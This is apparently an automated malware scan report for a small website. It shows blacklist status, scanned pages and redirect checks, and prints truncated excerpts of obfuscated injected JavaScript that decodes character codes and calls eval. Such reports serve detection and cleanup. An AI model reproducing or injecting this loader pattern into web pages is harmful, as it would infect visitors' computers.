Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=newkoreadriving.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://newkoreadriving.com/ | 200 OK Content-Length: 12543 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String.fromCharCode;zz=3;try{document.body&=2}catch(gdsgd){v="val";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,109,114,117,102,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,32,31,30,109,114,117,102,45,113,114,98,30,61,31,37 Antivirus reports:
| ||
http://newkoreadriving.com/./colloidal.html | 200 OK Content-Length: 3324 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String.fromCharCode;zz=3;try{document.body&=2}catch(gdsgd){v="val";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,32,31,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47, Antivirus reports:
| ||
http://newkoreadriving.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: newkoreadriving.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 12:17:29 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 12543
Content-Type: text/html
X-Powered-By: PHP/5.2.17
...12543 bytes of data.
GET / HTTP/1.1
Host: newkoreadriving.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 12:17:29 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 12543
Content-Type: text/html
X-Powered-By: PHP/5.2.17
...12543 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: newkoreadriving.com
Referer: http://www.google.com/search?q=newkoreadriving.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: newkoreadriving.com
Referer: http://www.google.com/search?q=newkoreadriving.com
Result:
The result is similar to the first query. There are no suspicious redirects found.